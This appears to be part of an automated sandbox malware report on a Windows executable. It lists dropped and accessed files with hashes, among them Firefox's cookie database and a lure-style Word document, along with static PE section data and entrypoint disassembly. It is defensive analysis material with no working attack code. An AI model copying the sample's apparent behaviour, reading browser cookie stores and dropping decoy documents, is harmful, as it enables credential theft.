                                                                                                                                                                                                                Preview:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\tmptxlecc.tmp

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\StL9joVVcT.exe
                                                                                                                                                                                                                File Type:ASCII text, with very long lines (2414), with no line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):2414
                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:Wttkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkke:Ys
                                                                                                                                                                                                                MD5:A9C3F0F10572F525DE7B20439A9DE268
                                                                                                                                                                                                                SHA1:773A87BB67E4A5666FA78DC621E5C4BC5E6EA19B
                                                                                                                                                                                                                SHA-256:91ECC87C870B1E3539034499FB0141E768C8B999BDDD2D807CFC02C32DB0B92E
                                                                                                                                                                                                                SHA-512:6F5BD20DD6788C84BBD6501F518FE0D972819AA64C526BF2D1E09DAB868B5283C4D323F9BAD15009614D0D4372B0DF7559FCCB7EC1533CC5DCA8B0C5464EAE91
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\tmpuq0jl1.tmp

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\StL9joVVcT.exe
                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1060), with no line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1060
                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:WttkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkE:Yi
                                                                                                                                                                                                                MD5:4753B60E479AF7E41F2C16CE0D2759DB
                                                                                                                                                                                                                SHA1:004D4B74F888C180C3D48B95BA2A64453195C7B5
                                                                                                                                                                                                                SHA-256:132ADC24B23981326539A87D5AF4805B4D85D4043780DDB1B7D1DC2904106AAE
                                                                                                                                                                                                                SHA-512:168E51C4B4D42B419EB1A897D21AC37433AA9B64BD721E5C31EE2216F49880F52EDA1F9A0D33E07EB82BAB74F6B2B29612D931E33540E43BC3901B01DC241405
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\tmpwqm2jy.tmp

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\StL9joVVcT.exe
                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1274), with no line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1274
                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:Wttkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkka:YI
                                                                                                                                                                                                                MD5:306C0AA0FA1235EDD5A1675C9A80EE49
                                                                                                                                                                                                                SHA1:68BA228BAEF848AF93642A4B1E2F9614BBAB6DEE
                                                                                                                                                                                                                SHA-256:FE14A1263FA888D58ADBE88D55D49AC83B543FD93FC38EF04644F2CE50D34000
                                                                                                                                                                                                                SHA-512:65F9D80A7E3EE75524B6AB2C45B93B83DCB23D49EA03A8FF62ED406FA77EA40912C5BECAB584DA47FE3789F5EAE295B722AA11BA806B14CFD5A4F5AFEA326A3E
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\StL9joVVcT.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):32768
                                                                                                                                                                                                                Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\Users\user\Desktop\e_sqlite3.dll

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\StL9joVVcT.exe
                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1780736
                                                                                                                                                                                                                Entropy (8bit):6.54388973247121
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24576:izDLT7eXc2a+xMPDBsvh58j6OQ/K4eSlrIBizB2J4bJGtpxnvUmhEocQ0x58:iTTXkMPDjj6O0d1Z9sxnvU3Z
                                                                                                                                                                                                                MD5:B1A10828FADDCB586CC3A9C7A01CBBBF
                                                                                                                                                                                                                SHA1:1D7EF8581F731D77C9621045C0F2712D654EBEF0
                                                                                                                                                                                                                SHA-256:1D2D090188CD500EB6098701690A72F090440162A651123EAB44132525597446
                                                                                                                                                                                                                SHA-512:12171C09B03BB2E163561B9B7618B3EC8566D3162A2472A63661A1F86F26118272F3A7C6608C09640D57D992DE52A840DEB41B5EB089E19D35E45D08492ACACF
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                                                                • Filename: #U2800.exe, Detection: malicious, Browse
                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......N..B.........A......A......A...+..A............X...*..X......X...................N..........Rich...........................PE..d.....Xg.........." .....*................................................................`A.............................................$......(....`.......`..P............p...... _..T............................_..8............@...............................text....(.......*.................. ..`.rdata......@......................@..@.data............n..................@....pdata..P....`......."..............@..@_RDATA.......P......................@..@.rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................

                                                                                                                                                                                                                C:\Users\user\Documents\Your_Benefits_and_Role.docx

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\StL9joVVcT.exe
                                                                                                                                                                                                                File Type:Microsoft Word 2007+
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):16036
                                                                                                                                                                                                                Entropy (8bit):7.395550738995465
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:djbGP/uGWZmqibNxt/ZtNNjpVjan+hjregKELqJJJYc:1bGP/uJZ7iBxllNjpVjFFLC
                                                                                                                                                                                                                MD5:8D226F80DA462D88E080C6BD6857550C
                                                                                                                                                                                                                SHA1:8F543B99D70FFED51B1BF9C6C33791592AAD04FF
                                                                                                                                                                                                                SHA-256:0AD7054EDB3D096B1D771D9E1FE393B98E11D2320124A1BEF51FFF9704D834E7
                                                                                                                                                                                                                SHA-512:F3CF47989D2BF28F30F7D9867396DF8F270821C6CE298C81A226E943E4E37D194642EA1A192D77FDE9C316B417C4B082B91130A9965C6271B829EA02F895BDC0
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:PK..........!.2.oWf...........[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j.0.E......J.(....e.h...4ND.B.....81.$14.. ..{..1...l...w%..=...^i7+...-.d.&.0.A.6.l4...L6.0#...S.O.....X...*..V$:...B~....^.K......../P..I..~7$....i..J&B0Z.Du.t.OJ.K(H.....xG...L.+..v......dc.....W>*..\XR..m.p....Z}.....HwnM.V..n....-..")/..ZwB`.....4........s.DX...j...;A*.....c......4....[.S..9.> ......{.V.4p....W.&....A......|.d.?.......PK..........!.........N......._rels/.rels ...(...........................

                                                                                                                                                                                                                C:\Users\user\Documents\~$ur_Benefits_and_Role.docx

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):162
                                                                                                                                                                                                                Entropy (8bit):4.641582006102127
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:MCGGhQsw1hRUDxodsYEr5lLCPBq:MDbyDxDDdlWPBq
                                                                                                                                                                                                                MD5:6992FC59A41A773A3A9C0DABC9D086AC
                                                                                                                                                                                                                SHA1:DB7D6542B55E2DFC8DBB2EB39EC47B99DA9B55AF
                                                                                                                                                                                                                SHA-256:51D5BCD011CDCAC5D8B094F61E1387672005288863A5F8654DCBE502616593E1
                                                                                                                                                                                                                SHA-512:18F51CC761F3ED04CB712DD79BD4A056894B183B9E04BB6132698B7C998C1DF4759F9D71BAC2B97F8829E98D0F407CD5D42CE8E658AD74BA12E888ABE970B929
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:............................................................R..P....G...'..Q*........1..1.5...t9".q...H.NXg.@R...G.~..&.a.I.,q.zf............}..j.....U...=.j

                                                                                                                                                                                                                Static File Info

                                                                                                                                                                                                                General

                                                                                                                                                                                                                File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                Entropy (8bit):6.919044156546819
                                                                                                                                                                                                                TrID:
                                                                                                                                                                                                                • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                                                                                                • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                File name:StL9joVVcT.exe
                                                                                                                                                                                                                File size:26'503'168 bytes
                                                                                                                                                                                                                MD5:aca235134c2d590750cf0710f9324b77
                                                                                                                                                                                                                SHA1:0486e4f1514c6133519d8d4924f2009097c0de04
                                                                                                                                                                                                                SHA256:61fde75c7a98bc432a0539a559ac0078bc91f69bccf0d899f59e3bcdcfad0471
                                                                                                                                                                                                                SHA512:93cf93a965570114bc377adecf4a4e7894ad4f8c8749091bdf301d9eb50d0a9785daa0c0e21e7982418a081fa66f6e78f1fd2f971502c82520903a77b01ec922
                                                                                                                                                                                                                SSDEEP:393216:20tgpDmN/wYLacHSyicGQbHmzwIz1hdYzXBxvg3ExNn0tgUeb6:wSF81hdYzXBxvA5+Jb
                                                                                                                                                                                                                TLSH:F647BF10A3E80A66E5BB9734C570C232CAB1BD625736D60F254DF2991F73B418B6B732
                                                                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........u...&...&...&...'...&...'...&...'...&...&...&...'...&...&K~.&...'...&...'...&...&...&...'...&o..'...&o..'...&Rich...&.......

                                                                                                                                                                                                                File Icon

                                                                                                                                                                                                                Icon Hash:6796a6a5a3aba4b3

                                                                                                                                                                                                                Static PE Info

                                                                                                                                                                                                                General

                                                                                                                                                                                                                Entrypoint:0x140081f0c
                                                                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                                                                Digitally signed:false
                                                                                                                                                                                                                Imagebase:0x140000000
                                                                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                Time Stamp:0x6783B12E [Sun Jan 12 12:10:22 2025 UTC]
                                                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                                                OS Version Major:6
                                                                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                                                                File Version Major:6
                                                                                                                                                                                                                File Version Minor:0
                                                                                                                                                                                                                Subsystem Version Major:6
                                                                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                                                                Import Hash:cc2c0bdc589a1141f97271fa57395fb5

                                                                                                                                                                                                                Entrypoint Preview

                                                                                                                                                                                                                Instruction
                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                sub esp, 28h
                                                                                                                                                                                                                call 00007EFF49146DE4h
                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                add esp, 28h
                                                                                                                                                                                                                jmp 00007EFF491463C7h
                                                                                                                                                                                                                int3
                                                                                                                                                                                                                int3
                                                                                                                                                                                                                jmp 00007EFF49147160h
                                                                                                                                                                                                                int3
                                                                                                                                                                                                                int3
                                                                                                                                                                                                                int3
                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                sub esp, 28h
                                                                                                                                                                                                                call 00007EFF4914715Ch
                                                                                                                                                                                                                jmp 00007EFF49146554h
                                                                                                                                                                                                                xor eax, eax
                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                add esp, 28h
                                                                                                                                                                                                                ret
                                                                                                                                                                                                                int3
                                                                                                                                                                                                                int3
                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                sub esp, 28h
                                                                                                                                                                                                                dec ebp
                                                                                                                                                                                                                mov eax, dword ptr [ecx+38h]
                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                mov ecx, edx
                                                                                                                                                                                                                dec ecx
                                                                                                                                                                                                                mov edx, ecx
                                                                                                                                                                                                                call 00007EFF49146562h
                                                                                                                                                                                                                mov eax, 00000001h
                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                add esp, 28h
                                                                                                                                                                                                                ret
                                                                                                                                                                                                                int3
                                                                                                                                                                                                                int3
                                                                                                                                                                                                                int3
                                                                                                                                                                                                                inc eax
                                                                                                                                                                                                                push ebx
                                                                                                                                                                                                                inc ebp
                                                                                                                                                                                                                mov ebx, dword ptr [eax]
                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                mov ebx, edx
                                                                                                                                                                                                                inc ecx
                                                                                                                                                                                                                and ebx, FFFFFFF8h
                                                                                                                                                                                                                dec esp
                                                                                                                                                                                                                mov ecx, ecx
                                                                                                                                                                                                                inc ecx
                                                                                                                                                                                                                test byte ptr [eax], 00000004h
                                                                                                                                                                                                                dec esp
                                                                                                                                                                                                                mov edx, ecx
                                                                                                                                                                                                                je 00007EFF49146565h
                                                                                                                                                                                                                inc ecx
                                                                                                                                                                                                                mov eax, dword ptr [eax+08h]
                                                                                                                                                                                                                dec ebp
                                                                                                                                                                                                                arpl word ptr [eax+04h], dx
                                                                                                                                                                                                                neg eax
                                                                                                                                                                                                                dec esp
                                                                                                                                                                                                                add edx, ecx
                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                arpl ax, cx
                                                                                                                                                                                                                dec esp
                                                                                                                                                                                                                and edx, ecx
                                                                                                                                                                                                                dec ecx
                                                                                                                                                                                                                arpl bx, ax
                                                                                                                                                                                                                dec edx
                                                                                                                                                                                                                mov edx, dword ptr [eax+edx]
                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                mov eax, dword ptr [ebx+10h]
                                                                                                                                                                                                                mov ecx, dword ptr [eax+08h]
                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                mov eax, dword ptr [ebx+08h]
                                                                                                                                                                                                                test byte ptr [ecx+eax+03h], 0000000Fh
                                                                                                                                                                                                                je 00007EFF4914655Dh
                                                                                                                                                                                                                movzx eax, byte ptr [ecx+eax+03h]
                                                                                                                                                                                                                and eax, FFFFFFF0h
                                                                                                                                                                                                                dec esp
                                                                                                                                                                                                                add ecx, eax
                                                                                                                                                                                                                dec esp
                                                                                                                                                                                                                xor ecx, edx
                                                                                                                                                                                                                dec ecx
                                                                                                                                                                                                                mov ecx, ecx
                                                                                                                                                                                                                pop ebx
                                                                                                                                                                                                                jmp 00007EFF4914656Eh
                                                                                                                                                                                                                int3
                                                                                                                                                                                                                int3
                                                                                                                                                                                                                int3
                                                                                                                                                                                                                int3
                                                                                                                                                                                                                int3
                                                                                                                                                                                                                int3
                                                                                                                                                                                                                int3
                                                                                                                                                                                                                int3
                                                                                                                                                                                                                int3
                                                                                                                                                                                                                int3
                                                                                                                                                                                                                int3
                                                                                                                                                                                                                int3
                                                                                                                                                                                                                int3
                                                                                                                                                                                                                int3
                                                                                                                                                                                                                int3
                                                                                                                                                                                                                nop word ptr [eax+eax+00000000h]
                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                cmp ecx, dword ptr [000000A9h]

                                                                                                                                                                                                                Rich Headers

                                                                                                                                                                                                                Programming Language:
                                                                                                                                                                                                                • [IMP] VS2008 SP1 build 30729

                                                                                                                                                                                                                Data Directories

                                                                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x1c0a7200x54.rdata
                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x1c0a7740x168.rdata
                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x1cf40000x9b16.rsrc
                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x1c510000xa2dbc.pdata
                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x1cfe0000x1fc8.reloc
                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x1ab5ec00x54.rdata
                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x1ab60800x28.rdata
                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1ab5d800x140.rdata
                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0xc520000xce0.rdata
                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                Sections

                                                                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                .text0x10000x8f4d80x8f600f2389e2f25cfddd6f055912893ccce91False0.427179258391456data6.6542551938105285IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                .managed0x910000x83f6580x83f800f3f87d9561b96e1da85dd93bb76e213bunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                hydrated0x8d10000x3809e80x0d41d8cd98f00b204e9800998ecf8427eunknownunknownunknownunknownIMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                .rdata0xc520000xfbb31c0xfbb40009598796b970609c74d512961956c496unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                .data0x1c0e0000x420b80xd80068edef3672b397b7aa07a08a5589746aFalse0.2815755208333333data5.0911881430418156IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                .pdata0x1c510000xa2dbc0xa2e00eabc640a9f51f54d1ceb74ca6aac03b3False0.4939982252494244data6.767137463413755IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                .rsrc0x1cf40000x9b160x9c00b176950f61bb488ed3e92f6dfb31eda0False0.038161057692307696data2.2789244959702764IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                .reloc0x1cfe0000x1fc80x2000c9bd96fa73dda75590b041fe50f00f88False0.21923828125data5.447378167486649IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                Resources

                                                                                                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                RT_ICON0x1cf41300x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 380160.019865461425268027
                                                                                                                                                                                                                RT_GROUP_ICON0x1cfd5d80x14data1.15
                                                                                                                                                                                                                RT_VERSION0x1cfd5ec0x340data0.42427884615384615
